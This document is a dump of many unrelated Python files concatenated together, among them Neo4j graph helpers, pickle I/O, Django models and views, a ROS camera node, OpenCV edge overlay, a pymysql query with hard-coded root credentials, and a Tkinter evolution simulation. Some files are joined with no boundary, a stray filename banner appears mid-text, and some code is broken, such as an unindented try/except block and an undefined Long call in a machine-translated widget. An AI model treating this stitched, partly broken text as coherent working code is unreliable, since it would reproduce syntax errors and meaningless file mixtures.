        term_id = None
        # For ambiguous names, try to reuse a term already linked to the
        # same word text (full ambiguous PER names and all non-PER types).
        if (w_text.find('|') > 0):
            if (w_type == 'PER'):
                if (w_text.find(' ') > 0):
                    term_id = self.getTermByWord(w_text, w_type)
            else:
                term_id = self.getTermByWord(w_text, w_type)
        if (not term_id):
            term_id = "%s|%s" % (w_text, w_type)
        if (w_text.find('|') > 0):
            self.graph.run(
                "MERGE (term:Term {id: {termId}}) "
                "ON CREATE SET term.text = {wText}, term.type = {wType}, term.incoming = 0, term.fuzzy = 'true' "
                "WITH term "
                "MATCH (word:LocalWord) "
                "WHERE id(word) = {wId} "
                "MERGE (word)-[:IS]->(term) "
                , {'termId': term_id, 'wText': w_text, 'wType': w_type, 'wId': w_id}
            )
        else:
            self.graph.run(
                "MERGE (term:Term {id: {termId}}) "
                "ON CREATE SET term.text = {wText}, term.type = {wType}, term.incoming = 0 "
                "WITH term "
                "MATCH (word:LocalWord) "
                "WHERE id(word) = {wId} "
                "MERGE (word)-[:IS]->(term) "
                , {'termId': term_id, 'wText': w_text, 'wType': w_type, 'wId': w_id}
            )
        return term_id
    def updateNstoryUrl(self, old_url, new_url):
        """Rename a story node after a redirect; if the new URL already has a
        node, delete the old duplicate instead. Returns the effective URL."""
        if (self.getNstory(new_url)):
            logging.info("Deleting duplicate Nstory with url %s " % (old_url) )
            dupeNstory = self.getNstory(old_url)
            if (dupeNstory):
                self.graph.delete(dupeNstory)
            return new_url
        logging.info("url %s redirected, updating news node" % (old_url) )
        results = self.graph.data(
            "MATCH (n:Nstory {url: {oldUrl} }) "
            "SET n.url = {newUrl} "
            "RETURN n.url "
            "LIMIT 1 "
            , {'oldUrl': old_url, 'newUrl': new_url}
        )
        if (len(results) > 0):
            return results[0]['n.url']
        return None
    def setErrorNstory(self, url):
        """Relabel the node as ErrorNstory so it is skipped in future runs."""
        self.graph.run(
            "MATCH (n:Nstory {url: {inUrl} }) "
            "REMOVE n:Nstory "
            "SET n:ErrorNstory "
            , {'inUrl': url}
        )
    def delDeadEndSentences(self, url):
        """Delete up to 50 sentences of a story that have no words attached.
        Returns the deleted count, or None when the query yields nothing."""
        results = self.graph.data(
            "MATCH (n:Nstory {url: {inUrl} })-->(s:Sentence) "
            "WHERE NOT (s)-->(:LocalWord) "
            "WITH DISTINCT s LIMIT 50 "
            "DETACH DELETE(s) "
            "RETURN count(*) as del_count "
            , {'inUrl': url}
        )
        if (len(results) > 0):
            return results[0]['del_count']
        else:
            return None
    def getTermByWord(self, w_text, w_type):
        """Return the id of a Term already linked to this word text/type."""
        results = self.graph.data(
            "MATCH (word:LocalWord {text: {wText}, type: {wType} })--(term:Term) "
            "RETURN term.id "
            "LIMIT 1 "
            , {'wText': w_text, 'wType': w_type}
        )
        if (len(results) > 0):
            return results[0]['term.id']
        else:
            return None
    def mergeTermInto(self, firstTerm, targetTerm):
        """Repoint every word of firstTerm at targetTerm, delete firstTerm
        and refresh targetTerm.incoming. Returns True when a merge happened."""
        if( len(firstTerm)>0 and len(targetTerm)>0 ):
            res_cursor = self.graph.run(
                "MATCH (first:Term {id: {firstId} })--(w:LocalWord) "
                "MATCH (target:Term {id: {targetId} }) "
                "MERGE (w)-[:IS]->(target) "
                "RETURN w.text "
                , {'firstId': firstTerm, 'targetId': targetTerm}
            )
            if res_cursor.forward():
                del_cursor = self.graph.run(
                    "MATCH (first:Term {id: {firstId} }) "
                    "DETACH DELETE(first) "
                    , {'firstId': firstTerm}
                )
                self.graph.run(
                    "MATCH (t:Term {id: {targetId} })-[r]-(:LocalWord) "
                    "WITH t, count(r) AS in_count "
                    "SET t.incoming = in_count "
                    , {'targetId': targetTerm}
                )
                return True
        return False
###########UudisKratt.py
|
"""
saving to and reading from pickle files
"""
from __future__ import annotations
from typing import Union, Dict, IO
try: # drop:py37 (backport)
from importlib.metadata import version
except ModuleNotFoundError:
from importlib_metadata import version
import pickle
def write_dict_pkl(fhandle: Union[str, IO], dictionary: Dict) -> None:
    """ writes a nested dictionary containing strings & arrays as data into
    a pickle file

    Note: adds a 'rsatoolbox_version' entry to the passed dictionary.

    Args:
        fhandle: a filename or opened writable (binary) file
        dictionary(dict): the dict to be saved
    """
    dictionary['rsatoolbox_version'] = version('rsatoolbox')
    if isinstance(fhandle, str):
        # We opened the file, so we are responsible for closing it
        # (the original leaked the handle).
        with open(fhandle, 'wb') as opened:
            pickle.dump(dictionary, opened, protocol=-1)
    else:
        # Caller-supplied handle: write but leave it open for the caller.
        pickle.dump(dictionary, fhandle, protocol=-1)
def read_dict_pkl(fhandle: Union[str, IO]) -> Dict:
    """ reads a nested dictionary containing strings & arrays as data from
    a pickle file

    Args:
        fhandle: a filename or opened readable (binary) file

    Returns:
        dictionary(dict): the loaded dict
    """
    if isinstance(fhandle, str):
        # We opened the file, so close it when done
        # (the original leaked the handle).
        with open(fhandle, 'rb') as opened:
            return pickle.load(opened)
    return pickle.load(fhandle)
|
from django.conf.urls import url
from . import views
# URL routes for the clubs app: the index and per-club detail pages.
urlpatterns = [
    # /            -> overview of all clubs
    url(r'^$', views.home_page, name='clubs_home_page'),
    # /<slug>/     -> one club's page; slug allows letters, digits, hyphens
    url(r'^(?P<slug>[-\w\d]+)/$', views.club_page, name='club_page'),
]
|
# package com.gwittit.client.example
import java
from java import *
from java.util.List import List
from pyjamas.ui import GWT
from com.google.gwt.event.dom.client.ClickEvent import ClickEvent
from com.google.gwt.event.dom.client.ClickHandler import ClickHandler
from pyjamas.rpc import AsyncCallback
from pyjamas.ui import Button
from pyjamas.ui import Composite
from pyjamas.ui import HTML
from pyjamas.ui import HorizontalPanel
from pyjamas.ui import Image
from pyjamas.ui import ListBox
from gwittit.client.facebook import ApiFactory
from gwittit.client.facebook import FacebookApi
from gwittit.client.facebook.entities import EventInfo
# NOTE(review): this file appears to be machine-translated from Java
# (pyjamas/GWT shim decorators like @java.init, @java.typed and nested
# "anonymous class" definitions). Do not restructure it by hand.
class EventSelector(Composite):
    """
    Let user select an event
    """
    @java.init
    def __init__(self, *a, **kw):
        # Widget fields; populated before the registered constructor runs.
        self.outer = HorizontalPanel()
        self.apiClient = ApiFactory.getInstance()
        self.selectButton = Button(u" Go ")
        self.selectHandler = None
        self.loader = Image(u"/loader.gif")
    @java.interface
    class EventSelectorHandler(java.Interface):
        # Callback interface: receives the selected event id.
        def onSelect(self, eid):
            pass
    @__init__.register
    @java.typed()
    def __init__(self, ):
        self.__init__._super()
        """
        New instance
        """
        self.outer.setSpacing(10)
        self.outer.add(HTML(u"Select Event: "))
        # Show a spinner while the events list loads asynchronously.
        self.outer.add(self.loader)
        class _anonymous(AsyncCallback):
            # Async callback for apiClient.eventsGet (Java anonymous class).
            @java.typed(Throwable)
            def onFailure(self, caught):
                self.outer.add(HTML(u"Failed get events..."))
            @java.typed(List)
            def onSuccess(self, result):
                # Replace the spinner with a dropdown of event names.
                self.outer.remove(self.loader)
                dropBox = ListBox(False)
                for e in result:
                    GWT.log(u"adding " + java.str(e.getName()), None)
                    dropBox.addItem(e.getName(), e.getEidString())
                self.outer.add(dropBox)
                self.outer.add(self.selectButton)
                class _anonymous(ClickHandler):
                    # Click handler for the Go button: notify the handler
                    # with the selected event id.
                    @java.typed(ClickEvent)
                    def onClick(self, event):
                        self.selectHandler.onSelect(Long(dropBox.getValue(dropBox.getSelectedIndex())))
                self.selectButton.addClickHandler(_anonymous())
        self.apiClient.eventsGet(None, _anonymous())
        self.initWidget(self.outer)
    @java.typed(EventSelectorHandler)
    def addSelectHandler(self, handler):
        # Register the callback invoked when the user picks an event.
        self.selectHandler = handler
|
import F00,F01
def topup():
    """Prompt for a username and an amount, then add the amount to that
    user's balance in the in-memory user table (F01.dataUser).

    NOTE(review): assumes F00.sliceArray(...,2,Jumlah) drops two header rows
    and that columns 3/6 are username/balance — confirm against F00/F01.
    The updated rows are only changed in memory here; persistence (if any)
    must happen elsewhere.
    """
    Jumlah = F00.banyakParam(F01.dataUser)
    kolomUsername = 3
    kolomSaldo = 6
    tmpDataTopUp = F00.sliceArray(F01.dataUser,2,Jumlah)
    username = input("Masukkan username: ")
    topup = input("Masukkan saldo yang di-top up: ")
    # NOTE(review): range(0, Jumlah-1) skips the final index — possibly the
    # last data row is never checked; verify against the slicing above.
    for idxDataUser in range(0,Jumlah-1):
        saldo = tmpDataTopUp[idxDataUser][kolomSaldo]
        if (username == tmpDataTopUp[idxDataUser][kolomUsername]):
            # Balances are stored as strings; convert, add, store back.
            total = int(saldo) + int(topup)
            tmpDataTopUp[idxDataUser][kolomSaldo] = str(total)
            print("Top up berhasil. Saldo "+username+" bertambah menjadi", total)
|
#!/usr/bin/env python3
import sys
import os
sys.path.append(os.getcwd())
# run.py - file to actually run
from GeometricModel import GeometricModel
from StraightWireModel import StraightWireModel
from PinkNoiseModel import PinkNoiseModel
from Electrode import Electrode
from helpers import *
import networkx as nx
from random import sample
import matplotlib.pyplot as plt
# model parameters
r_e = 0.4 # electrode radius
alpha = 1 # distance between electrode centers
density = 30 # wire density constant
# specific for pink noise model
numPointsPerWire = 201 # from paper
# sweep parameters for the square root of the number of electrodes
num_e_min = 3
num_e_max = 40
# initialize array for small world coefficient parameters
sigma_array = []
#"""
# begin sweep of square root of electrode count:
for root_num_e in range(num_e_min, num_e_max + 1):
    print("working on root_num_e = ", root_num_e)
    # initialize geometric model
    model = PinkNoiseModel(density, r_e, alpha, root_num_e ** 2, numPointsPerWire, spacing=False)
    # plot geometric model
    model.plotModel()
    # generate equivalent bipartite graph
    [equivalentGraph, e_nodes] = model.generateEquivalentBipartiteGraph()
    # generate random bipartite graph with the same node and edge counts
    [randomGraph, rand_e_nodes] = generateRandomBipartiteGraph(model.num_e,
        model.numValidWires, model.numValidEdges)
    # get average shortest path length and square clustering coefficient for both graphs
    [L, C] = analyzeBipartiteGraph(equivalentGraph, e_nodes)
    [L_r, C_r] = analyzeBipartiteGraph(randomGraph, rand_e_nodes)
    # compute small world coefficient
    sigma_array.append(computeSmallWorldCoefficient(L, C, L_r, C_r))
# plot small world coefficient versus square root of electrode count
plotSmallWorldSweep(sigma_array, range(num_e_min, num_e_max + 1))
#"""
# Disabled experiment kept as an inert string literal.
# BUG FIX: the block was opened with \"\"\" but closed with ''', which left
# the string unterminated and made the whole file a SyntaxError.
"""
# create large network first
model = PinkNoiseModel(density, r_e, alpha, 16 ** 2, numPointsPerWire, spacing=True)
# plot model
model.plotModel()
# generate equivalent bipartite graph
equivalentGraph = model.generateGraph()
#nx.draw(equivalentGraph)
#plt.show()
# sweep chemical distance and store N(r) in a vector
r_vec = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
N_vec = []
random_nodes = sample(list(equivalentGraph.nodes()), len(r_vec))
for i in range(len(r_vec)):
    r = r_vec[i]
    seed = random_nodes[i]
    ego_net = nx.ego_graph(equivalentGraph, seed, radius=r)
    N_vec.append(len(ego_net.nodes()))
    print("for r = ", r_vec[i], ": N(r) = ", N_vec[i])
print(r_vec)
print(N_vec)
plt.loglog(r_vec, N_vec)
plt.xlabel('r')
plt.ylabel('N(r)')
plt.savefig('N_vs_r_plot.png')
"""
|
import pymysql

# Dump the first row of bank.customer and report the total row count.
conn = pymysql.connect(host='localhost', user='root', password='root', db='bank')
a = conn.cursor()
# BUG FIX: MySQL identifiers take backticks (or nothing), not string quotes;
# SELECT * from 'customer' is a syntax error.
sql = "SELECT * from `customer`"
# Execute once; cursor.execute returns the number of rows found
# (the original ran the same query twice).
countrow = a.execute(sql)
print("number of row", countrow)
data = a.fetchone()
print(data)
a.close()
conn.close()
|
""" testapp2 app configs """
from django.apps import AppConfig
class Testapp2Config(AppConfig):
    """Django application configuration for the ``testapp2`` app."""
    name = 'testapp2'
|
import cv2
import numpy as np
import os
from argparse import ArgumentParser
from os.path import join
def get_canny_bounds(frame,
                     color=[36,255,12]):
    """
    Return the image with its Canny edges painted over it.

    :param frame: path to the image file
    :param color: BGR color used for edge pixels
    :return: float array scaled to [0, 1] with edges drawn in ``color``
    """
    img = cv2.imread(frame)
    edges = cv2.Canny(img, 50, 150)
    # Vectorized replacement of the original per-pixel Python loops:
    # copy the image and overwrite edge pixels with the highlight color.
    out_frame = img.copy()
    out_frame[edges == 255] = color
    return out_frame / 255.
# CLI: overlay Canny edges on every extracted frame of one video and
# display them in sequence.
parser = ArgumentParser()
parser.add_argument("--video_name",
                    default="F5_1_2_1.ts",
                    required=False)
parser.add_argument("--frames_dir",
                    default="/Users/artemsenin/nornickel_hack/all_frames",
                    required=False)

if __name__ == "__main__":
    args = parser.parse_args()
    all_frames = os.listdir(args.frames_dir)
    # Keep only the frames belonging to the requested video.
    video_frames = [frame for frame in all_frames
                    if args.video_name in frame]
    n_frames = len(video_frames)
    for i in range(n_frames):
        # Frames are assumed to be named "<video>_f_<index>.jpg" —
        # NOTE(review): confirm against the frame extraction step.
        frame_path = join(args.frames_dir, f"{args.video_name}_f_{i}.jpg")
        canny_bounds = get_canny_bounds(frame_path)
        cv2.imshow('canny_bounds', canny_bounds)
        cv2.waitKey(1)
|
def two_oldest_ages(ages):
    """Return the two largest values of ages as [second_oldest, oldest].

    Requires at least two elements. Fix: the original sorted the list
    twice; sorting once is sufficient.
    """
    ordered = sorted(ages)
    return [ordered[-2], ordered[-1]]
def two_oldest_ages_up(ages):
    """Return the two largest values of ages in ascending order."""
    ordered = sorted(ages)
    return ordered[len(ordered) - 2:]
def two_oldest_ages_up2(ages):
    """Sort ages in place, then return its two largest values ascending."""
    ages.sort()
    second_oldest = ages[-2]
    oldest = ages[-1]
    return [second_oldest, oldest]
# Demo: all three variants should print [45, 87] for this input.
print(two_oldest_ages([1, 5, 87, 45, 8, 8]))
print(two_oldest_ages_up([1, 5, 87, 45, 8, 8]))
print(two_oldest_ages_up2([1, 5, 87, 45, 8, 8]))
class Node:
    """A single node of a singly linked list."""
    def __init__(self, data):
        self.data = data
        self.next = None

class LinkedList:
    """Singly linked list with a set-based cycle detector."""
    def __init__(self):
        self.head = None

    def push(self, new_data):
        """Insert a new node carrying new_data at the front of the list."""
        node = Node(new_data)
        node.data = new_data
        node.next, self.head = self.head, node

    def printList(self):
        """Print each value from head to tail, space-separated."""
        node = self.head
        while node:
            print(node.data, end=" ")
            node = node.next

    def DetectLoop(self):
        """Return the number of nodes traversed before revisiting one
        (i.e. a cycle was found), or 0 when the list is acyclic."""
        seen = set()
        steps = 0
        node = self.head
        while node:
            if node in seen:
                return steps
            seen.add(node)
            node = node.next
            steps += 1
        return 0
# Build the list 10 -> 15 -> 4 -> 20 (push prepends), then add a cycle.
llist = LinkedList()
llist.push(20)
llist.push(4)
llist.push(15)
llist.push(10)
# Loop: the second node points back to the head (10 -> 15 -> 10 -> ...).
llist.head.next.next = llist.head;
t = llist.DetectLoop()
# DetectLoop returns the step count at which a node repeated (here 2),
# or 0 when there is no loop.
if t >0 :
    print (t)
else:
    print ("No Loop ")
|
from django.contrib.auth.models import User
from django.db import models
from django.db.models.signals import post_save
from phonenumber_field.modelfields import PhoneNumberField
from project_admin.models import development_methodology, Development_Tool
class ProjectDetail(models.Model):
    """Core record of a client project: owner, company contact details,
    schedule, and descriptive sections."""
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=100)
    company_name = models.CharField(max_length=100)
    company_email = models.EmailField(max_length=100, unique=True)
    company_phone = PhoneNumberField(null=False, blank=False, unique=True)
    company_address = models.TextField(max_length=200)
    start_date = models.DateField(auto_now=False, auto_now_add=False)
    completion_date = models.DateField(auto_now=False, auto_now_add=False)
    project_summary = models.TextField(max_length=1000)
    project_goal = models.TextField(max_length=1000)
    project_impact = models.TextField(max_length=1000)
    project_requirement = models.TextField(max_length=1000)
    # NOTE(review): the field shadows the imported model class of the same
    # name; Django resolves the first argument to that class, but renaming
    # the import would be clearer.
    development_methodology = models.ForeignKey(development_methodology, on_delete=models.CASCADE)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.title
class ProjectDevelopmentTool(models.Model):
    """Technology stack choices (frontend/backend/db/server/repo) per project."""
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    fronted = models.CharField(max_length=100)
    backend = models.CharField(max_length=100)
    database = models.CharField(max_length=100)
    server_side = models.CharField(max_length=100)
    repository = models.CharField(max_length=100)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name.title
class ProjectTeamMember(models.Model):
    """A named team member with a designation on one project."""
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    designation = models.CharField(max_length=100)
    member_name = models.CharField(max_length=100)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name.title
class ProjectFeaturePayment(models.Model):
    """Per-feature payment breakdown stored as a JSON blob."""
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    feature = models.JSONField(default=None)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name.title
class ProjectMonthlyPayment(models.Model):
    """Monthly payment schedule stored as a JSON blob."""
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    monthly = models.JSONField(default=None)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name.title
class ProjectServiceCharge(models.Model):
    """Service charge and (optional) computed total for a project."""
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    service = models.FloatField()
    total = models.FloatField(blank=True, null=True)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name.title
class ClientProfile(models.Model):
    """Login/contact profile of the client attached to one project."""
    client_name = models.CharField(max_length=100)
    profile_name = models.ForeignKey(User, on_delete=models.CASCADE)
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    email = models.EmailField(max_length=100, unique=True, blank=True)
    # SECURITY NOTE(review): this stores the password as plain text; it
    # should be hashed (e.g. django.contrib.auth.hashers) before saving.
    password = models.CharField(max_length=100)
    client_phone = PhoneNumberField(blank=True, unique=True, max_length=14)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.client_name
class ToDoList(models.Model):
    """A to-do note a user attaches to a project."""
    project_name = models.ForeignKey(ProjectDetail, on_delete=models.CASCADE)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    todo = models.TextField(max_length=300)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.user.username
class Timeline_User(models.Model):
    """Append-only snapshot of a project's schedule, one row per ProjectDetail save.

    NOTE(review): project/profile are denormalised as plain strings; the
    signal handler below matches rows on these text values.
    """
    project_name = models.CharField(max_length=50)
    profile_name = models.CharField(max_length=50)
    start_date = models.DateField(blank=True, auto_now=False, auto_now_add=False, null=True)
    # Original planned completion date, carried forward across snapshots.
    completion_date = models.DateField(blank=True, auto_now=False, auto_now_add=False, null=True)
    # Revised completion date recorded on updates (null on the first snapshot).
    update_completion_date = models.DateField(blank=True, auto_now=False, auto_now_add=False, null=True)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name
def save_timeline_by_user_update(sender, instance, created, **kwargs):
    """post_save receiver for ProjectDetail: append a Timeline_User snapshot.

    On creation it records the project's planned dates; on every later save
    it records the revised completion date alongside the originally planned
    one (carried forward from the latest snapshot).
    """
    if created:
        Timeline_User.objects.create(
            project_name=instance.title,
            profile_name=instance.profile_name,
            start_date=instance.start_date,
            completion_date=instance.completion_date,
        )
    else:
        # BUG FIX: a new snapshot row is appended on every update, so the
        # original .get() raised MultipleObjectsReturned from the second
        # update on (and DoesNotExist when no snapshot existed at all).
        # Use the most recent snapshot instead.
        latest = (
            Timeline_User.objects
            .filter(project_name=instance.title, profile_name=instance.profile_name)
            .order_by('-created_on')
            .first()
        )
        # Fall back to the instance's own date if no snapshot exists yet
        # (e.g. the project predates this signal handler).
        com = latest.completion_date if latest else instance.completion_date
        Timeline_User.objects.create(
            project_name=instance.title,
            profile_name=instance.profile_name,
            start_date=instance.start_date,
            completion_date=com,
            update_completion_date=instance.completion_date,
        )
post_save.connect(save_timeline_by_user_update, sender=ProjectDetail)
class ProjectPaymentDone(models.Model):
    """Payment ledger for a project, seeded from ProjectServiceCharge.

    NOTE(review): project/profile are stored as plain strings rather than
    foreign keys — confirm this denormalisation is intentional.
    """
    project_name = models.CharField(max_length=50)
    profile_name = models.CharField(max_length=50)
    # Seeded from ProjectServiceCharge.total by the signal handler below.
    budget = models.FloatField(blank=True, null=True)
    previous_payment = models.FloatField(blank=True, null=True, default=0.0)
    due = models.FloatField(blank=True, null=True)
    created_on = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __str__(self):
        return self.project_name
def save_payment_done_update(sender, instance, created, **kwargs):
    """post_save receiver: seed a ProjectPaymentDone ledger row for each new
    ProjectServiceCharge; updates to existing charges are deliberately ignored."""
    if not created:
        return
    ProjectPaymentDone.objects.create(
        project_name=instance.project_name.title,
        profile_name=instance.profile_name,
        budget=instance.total,
    )
post_save.connect(save_payment_done_update, sender=ProjectServiceCharge)
|
from django.shortcuts import render, HttpResponse, redirect
from django.views.generic import TemplateView, FormView, CreateView
from django.core.exceptions import ValidationError
from firstapp.forms import ContactUsForm, RegistrationFormSeller, RegistrationForm, RegistrationFormSeller2
from django.urls import reverse_lazy, reverse
from firstapp.models import SellerAdditional, CustomUser
from django.contrib.auth.views import LoginView, LogoutView
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
def index(request):
    """Render the seller landing page."""
    return render(request, 'seller/index.html')
class LoginViewUser(LoginView):
    """Standard Django login view rendered with the seller template.

    On success LoginView redirects to settings.LOGIN_REDIRECT_URL.
    """
    template_name = "seller/login.html"
    #success_url = reverse_lazy('index')
class RegisterViewSeller(LoginRequiredMixin, CreateView):
    """Upgrade the logged-in user to a seller and create their seller record.

    Requires authentication; the created object is linked to the current user.
    """
    template_name = 'seller/register.html'
    form_class = RegistrationFormSeller2
    success_url = reverse_lazy('index')
    def form_valid(self, form):
        user = self.request.user
        # BUG FIX: the original appended SELLER unconditionally, so each
        # (re-)submission duplicated the role in user.type.
        if user.Types.SELLER not in user.type:
            user.type.append(user.Types.SELLER)
            user.save()
        # Attach the new seller record to the current user before saving.
        form.instance.user = self.request.user
        return super().form_valid(form)
class LogoutViewUser(LogoutView):
    """Log the user out and redirect to the index page.

    BUG FIX: Django's LogoutView has no ``success_url`` attribute — the
    redirect target is ``next_page`` — so the original setting had no effect.
    """
    next_page = reverse_lazy('index')
    success_url = reverse_lazy('index')  # kept for backward compatibility; unused by LogoutView
class RegisterView(CreateView):
    """Sign-up view for a base (non-seller) user account."""
    template_name = 'seller/registerbaseuser.html'
    form_class = RegistrationForm
    success_url = reverse_lazy('index')
# -*- coding: utf-8 -*-
# UI locators for the fund-holdings (jjcc) query page.
# Name input field
jjcc_clientName_xpath = 'xpath=//*[@id="clientName"]'
# National ID (identity card) number input field
jjcc_idCard_xpath = 'xpath=//*[@id="idCard"]'
# "Query" button
jjcc_cx_xpath = 'xpath=//*[@id="dynamic-table_wrapper"]/div/div[2]/label/button'
# "Confirm" button
jjcc_qd_xpath = 'xpath=/html/body/div[8]/div/div/div[2]/button'
|
#!/usr/bin/env python
# publishes the video filmed by the camera
import rospy
from sensor_msgs.msg import Image
import cv2
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
def update_image(msg):
    """ROS subscriber callback: stash the latest frame and mark it available."""
    global frame, bridge, flag
    frame = bridge.imgmsg_to_cv2(msg, "mono8")
    # Unconditional assignment is equivalent to the original
    # "if not flag: flag = True" guard — True stays True.
    flag = True
# Initiate node
rospy.init_node('video_decoding')
# Node rate
# rate = rospy.Rate(10)
# Bridge object
bridge = CvBridge()
# Subscriber to compressed image
# NOTE(review): the topic wraps a compressed payload in sensor_msgs/Image,
# hence the cv2.imdecode below — confirm against the publisher node.
sub = rospy.Subscriber('camera/image_compressed', Image, update_image)
# Publisher
# pub = rospy.Publisher('camera/image_uncompressed', Image, queue_size=1)
frame = np.ndarray(0)  # placeholder until the first message arrives
flag = False  # set True by update_image() once a frame is available
# Publishing the frame
# NOTE(review): busy-waits until the first frame; a rate.sleep() would ease CPU load.
while not rospy.is_shutdown():
    if flag:
        frame2 = cv2.imdecode(frame, 1)
        cv2.imshow('Image decompresse', frame2)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
        # print type(frame2)
        # try:
        #     pub.publish(bridge.cv2_to_imgmsg(frame2, "bgr8"))
        # except CvBridgeError as e:
        #     print e
    # rate.sleep()
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from pdb import set_trace
class UserType(models.Model):
    """Lookup table of the fixed user roles; the role constant is the primary key."""
    STUDENT = 1
    RECOMMENDER = 2
    COUNSELOR = 3
    REVIEWER = 4
    ADMIN = 5
    ROLE_CHOICES = (
        (STUDENT, 'student'),
        (RECOMMENDER, 'recommender'),
        (COUNSELOR, 'counselor'),
        (REVIEWER, 'reviewer'),
        (ADMIN, 'admin'),
    )
    # The role id doubles as the primary key, so each role exists at most once.
    id = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, primary_key=True)
    def __str__(self):
        # get_id_display() returns the human-readable label from ROLE_CHOICES.
        return self.get_id_display()
class MeritUser(models.Model):
    """Profile extension attached one-to-one to every auth User."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    updated_at = models.DateTimeField(auto_now=True)
    # A user may hold several roles simultaneously.
    user_types = models.ManyToManyField(UserType)
@receiver(post_save, sender=User)
def create_merit_user(sender, instance, created, **kwargs):
    """Create the companion MeritUser profile when a User is first saved."""
    if not created:
        return
    MeritUser.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_merit_user(sender, instance, **kwargs):
    """Re-save the related MeritUser on every User save.

    NOTE(review): assumes ``instance.merituser`` exists — true for users
    created after create_merit_user() above was connected; a pre-existing
    user without a profile would raise RelatedObjectDoesNotExist here.
    """
    instance.merituser.save()
|
import settings
import time
import tools
import random
from tkinter import *
from cells import Cell, Accident
# Window and canvas setup for the evolution simulation.
root = Tk()
root.title('Evolution')
root.geometry('1265x720')
canvas = Canvas(root, width=1280, height=720, background='yellow')
canvas.pack()
# grid[row][col] holds the canvas rectangle id of each playable tile (0 for walls).
grid = [[0]*settings.COL for g in range(settings.ROW)]
x1 = 0
y1 = 0
x2 = settings.CELL_X
y2 = settings.CELL_Y
cells = []
# Maps canvas item id -> occupant type ('wall', 'food', ...); see trailer docstring.
position_on_map = {}
# create a field for the existence of the cells and saving they id to the array
for idx, row in enumerate(grid):
    if idx == 0 or idx == len(grid) - 1:  # first and last row is grey
        for col in row:
            canvas.create_rectangle(x1, y1, x2, y2, fill=settings.WALL)
            x1 += settings.CELL_X
            x2 += settings.CELL_X
    else:
        for i, col in enumerate(row):
            if i == 0 or i == len(row) - 1:  # right and left col is grey
                canvas.create_rectangle(x1, y1, x2, y2, fill=settings.WALL)
            else:  # other cells is white
                row[i] = canvas.create_rectangle(x1, y1, x2, y2, fill=settings.EMPTY)
            x1 += settings.CELL_X
            x2 += settings.CELL_X
    # rewind to the start of the next row
    x1 = 0
    x2 = settings.CELL_X
    y1 += settings.CELL_Y
    y2 += settings.CELL_Y
# Spawn the initial population.
for _ in range(25):
    cells.append(tools.create_cell(canvas, grid, position_on_map))
position_on_map[0] = 'wall'
# Scatter the first batch of food.
for i in range(200):
    food_id = tools.create_food(position_on_map, grid)
    canvas.itemconfig(food_id, fill=settings.FOOD)
    position_on_map[food_id] = 'food'
best_dna = []
dead_cells = []
counter = 0
# BUG FIX: time.clock() was deprecated since 3.3 and removed in Python 3.8;
# time.perf_counter() is the documented replacement for elapsed-time timing.
start = time.perf_counter()
# Main simulation loop: move cells, feed them, cull the dead, and breed a
# new generation from the DNA of the 5 survivors.
while bool(cells):
    canvas.update()
    for cell in cells:
        if len(cells) > 5:
            while cell['cell'].can_move():
                cell['cell'].action(canvas, position_on_map)
                if cell['cell'].cell_ate():
                    # Replace the eaten food item with a fresh one elsewhere.
                    remove_id = cell['cell'].get_ate_cell_id()
                    canvas.itemconfig(remove_id, fill=settings.EMPTY)
                    del position_on_map[remove_id]
                    food_id = tools.create_food(position_on_map, grid)
                    canvas.itemconfig(food_id, fill=settings.FOOD)
                    position_on_map[food_id] = 'food'
            if not cell['cell'].has_health():
                if len(cells) - len(dead_cells) - 1 < 5:
                    # Several cells may be killed within a single iteration,
                    # which could drop the population below 5.  To prevent
                    # that, when the fifth-from-last cell is about to die we
                    # stop the loop so it survives.  (Translated from the
                    # original Russian note.)
                    break
                else:
                    cell['cell'].kill(canvas, position_on_map)
                    dead_cells.append(cell)
            else:
                cell['cell'].reset_steps()
        else:
            break
    # Remove cells that died during this sweep.
    if len(dead_cells) > 0:
        for dead_cell in dead_cells:
            cells.remove(dead_cell)
        dead_cells.clear()
    if len(cells) == 5:
        # Generation over: harvest the survivors' DNA and start a new one.
        for cell in cells:
            best_dna.append(cell['cell'].get_dna())
            cell['cell'].kill(canvas, position_on_map)
        cells.clear()
        for j in range(25):
            cells.append(tools.create_cell(canvas, grid, position_on_map))
        # Each survivor's DNA is cloned into 5 of the 25 newcomers.
        for idx, cell in enumerate(cells):
            cell['cell'].set_dna(best_dna[idx % 5].copy())
        best_dna.clear()
